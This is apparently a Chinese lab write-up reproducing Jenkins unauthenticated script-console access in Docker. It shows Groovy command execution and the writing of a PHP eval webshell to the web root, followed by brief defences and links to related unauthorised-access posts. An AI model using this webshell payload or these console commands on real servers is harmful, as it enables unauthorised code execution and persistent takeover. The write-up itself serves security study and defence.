jenkins未授权访问漏洞记录(端口:7001,80,8080,50000)
一、漏洞描述
未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。
二、漏洞环境搭建
docker pull docker.io/jenkins
开启服务(我执行的第一条命令即可)
How to use this image
docker run -p 8080:8080 -p 50000:50000 jenkins
This will store the workspace in /var/jenkins_home. All Jenkins data lives in there - including plugins and configuration. You will probably want to make that a persistent volume (recommended):
docker run -p 8080:8080 -p 50000:50000 -v /your/home:/var/jenkins_home jenkins
This will store the jenkins data in
/your/home
on the host. Ensure that/your/home
is accessible by the jenkins user in container (jenkins user - uid 1000) or use-u some_other_user
parameter withdocker run
.You can also use a volume container:
docker run --name myjenkins -p 8080:8080 -p 50000:50000 -v /var/jenkins_home jenkins
Then myjenkins container has the volume (please do read about docker volume handling to find out more).
三、漏洞复现
1、浏览器访问http://192.168.8.24:8080/manage,可以看到没有做任何限制,可以直接访问
2、点击”脚本命令行”(http://192.168.8.24:8080/script)
3、执行shell系统命令:println "uname -a".execute().text
4、利用”脚本命令行”上传webshell,内容如下:
new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');
5、点击“运行”,没有报错,上传成功
6、菜刀连接
四、漏洞防御
1、对后台控制页面做登录验证限制
2、升级版本
五、参考文章
https://www.cnblogs.com/yuzly/p/11255609.html
jenkins未授权访问漏洞记录(端口:7001,80,8080,50000)相关推荐
- Redis未授权访问漏洞记录(端口:6379)
目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 写入/etc/passwd文件 利用主从复制RCE 本地Red ...
- MongoDB未授权访问漏洞记录(端口:27017,37017)
一.漏洞危害 对外开放的MongoDB服务,未配置访问认证授权,无需认证连接数据库后对数据库进行任意操作(增.删.改.查高危动作),存在严重的数据泄露风险. 二.漏洞成因 MongoDB服务安装后,默 ...
- PHP-FPM Fastcgi 未授权访问漏洞(端口9000)
漏洞原理 Fastcgi Fastcgi是一个通信协议,和HTTP协议一样,都是进行数据交换的一个通道.HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组 ...
- docker remote api未授权访问漏洞(端口:2375)
漏洞介绍: 该未授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作docker. docker ...
- Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)
1. 漏洞介绍及危害 Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录.Rsync 默认允许匿 ...
- CouchDB未授权访问漏洞记录(端口:5984、6984,CVE-2017-12635,CVE-2017-12636)复现失败
复现exp失败 漏洞简介以及危害 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript ...
- Jboss未授权访问漏洞记录(影响版本:全版本,端口:80,8080)
一.前言 漏洞原因:在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码. 二.环境配置 使用docker搭建环境 ...
- Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)
Druid简介 1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池. 2.Druid提供的监控功能,监控SQL的执行时间.监控Web URI的请求.Session监控. Druid可能 ...
- ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)
漏洞简介 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件.它是一个为分布式应用提供一致性服务的软件 ...
最新文章
- python 读取csv文件生成散点图
- 数组-移除元素(交换移除)
- java链表寻找中间节点
- linux svn强制注释,svn强制提交时添加注释
- 计算机强化课程计算机网络,大学计算机网络技术课程教学改革
- android 两端对齐,LinearLayout子控件两端对齐
- 2.1.3码元、波特、速率、带宽
- 【转】Rhythm Of The Rain 雨的旋律
- 【Linux】Linux中变量#,@,0,1,2,*,$$,$?的解释
- ElasticSearch启动报错at least one of [discovery.seed_hosts, discovery.seed_provid---ElasticSearch工作笔记032
- java课程设计文档_Java课程设计-文档相似性检查系统(完整)测试版
- Unity3d美颜滤镜
- 树莓派接入VGA显示器画面不全偏左的问题与VGA转HDMI连接显示器无法输出声音的解决
- 2013 中国15大云平台
- 分块矩阵乘法以及求逆应用
- macbook卡在进度条开不了机_Mac 开机停在进度条解决方法
- 网络安全——病毒详解以及批处理01(自启动,修改密码 定时关机,蓝屏,进程关闭)
- 苹果手机科学计算机怎样调用,iOS上的表达式科学计算器Calculator i++使用说明
- 阿里云ECS七天训练营-搭建FTP
- 2021.1.15——星露谷作物计算器的小改进
热门文章
- ​北京大学吴华君课题组高新诚聘 医学生信 助理研究员和博士后
- 部分植物基因组数据库汇总
- Digital Text Animations for Mac - 未来感活力全屏标题动画fcpx插件
- FCPX插件:半调图像高级马赛克特效Yanobox Mosaic
- P2249 【深基13.例1】查找(AC) 2022.1.28
- 十大常用个人linux,Linux—常用十大命令
- 水文特点是什么意思_水文监测仪器设备简介
- python两个编程环境_多个python Behave环境安装文件
- 刀剑神域动漫网页设计作品 学生表格布局网页作业成品 table漫画网站制作 dreamweaver静态HTML学生网页制作模板
- postman安装路径_Newman进行postman脚本自动化